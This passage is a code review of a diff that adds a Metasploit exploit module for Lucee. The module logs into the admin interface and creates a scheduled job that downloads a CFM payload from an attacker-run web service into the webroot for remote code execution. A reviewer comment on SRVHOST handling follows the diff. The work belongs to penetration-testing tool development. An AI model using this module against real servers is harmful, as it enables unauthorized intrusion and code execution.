modules/exploits/multi/http/lucee_scheduled_job.rb

```diff
@@ -0,0 +1,282 @@
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            # /opt/lucee/server/lucee-server/context/logs/application.log
+            # /opt/lucee/web/logs/exception.log
+            IOC_IN_LOGS,
+            ARTIFACTS_ON_DISK,
+            # ColdFusion files located at the webroot of the Lucee server
+            # C:/lucee/tomcat/webapps/ROOT/ by default on Windows
+            # /opt/lucee/tomcat/webapps/ROOT/ by default on Linux
+          ]
+        },
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'DisclosureDate' => '2023-02-10'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8888),
+        OptString.new('PASSWORD', [false, 'The password for the administrative interface']),
+        OptString.new('TARGETURI', [true, 'The path to the admin interface.', '/lucee/admin/web.cfm']),
+        OptInt.new('EXECUTE_DELAY', [false, 'Time in seconds to wait before attempting to access the payload', 1]),
+      ]
+    )
+    deregister_options('URIPATH')
+  end
+
+  def exploit
+    payload_base = rand_text_alphanumeric(8..16)
+    authenticate
+
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          print_status("#{peer} - Payload request received: #{req.uri}")
+          send_response(cli, cfm_stub)
+        end,
+        'Path' => '/' + payload_base + '.cfm'
+      }
+    })
+
+    #
+    # Create the scheduled job
+    #
+    create_job(payload_base)
+
+    #
+    # Execute the scheduled job and attempt to send a GET request to it.
+    #
+    execute_job(payload_base)
+    print_good('Exploit completed.')
+
+    #
+    # Removes the scheduled job
+    #
+
+    print_status('Removing scheduled job' + payload_base)
+    cleanup_request = send_request_cgi({
+      'method' => 'POST',
+      'uri' => target_uri.path + '?action=services.schedule',
+      'vars_post' => {
+        'row_1' => '1',
+        'name_1' => payload_base.to_s,
+        'mainAction' => 'delete'
+      }
+    })
+    if cleanup_request && cleanup_request.code == 302
+      print_good('Scheduled job removed.')
+    else
+      print_bad('Failed to remove scheduled job.')
+    end
+  end
+
+  def authenticate
+    auth = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'login_passwordweb' => datastore['PASSWORD'],
+        'lang' => 'en',
+        'rememberMe' => 's',
+        'submit' => 'submit'
+      }
+
+    })
+
+    if auth && auth.code == 200 && auth.body.include?('nav_Security')
+      print_good('Authenticated Successfully')
+    else
+      fail_with(Failure::NoAccess, 'Unable to authenticate. Please double check your credentials and try again.')
+    end
+  end
+
+  def create_job(payload_base)
+    if (datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::')
```

Comment:
You want to use something like this to handle the variations correctly.
```suggestion
    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
```

Really though this should be handled by `get_uri` though and shouldn't be necessary at all.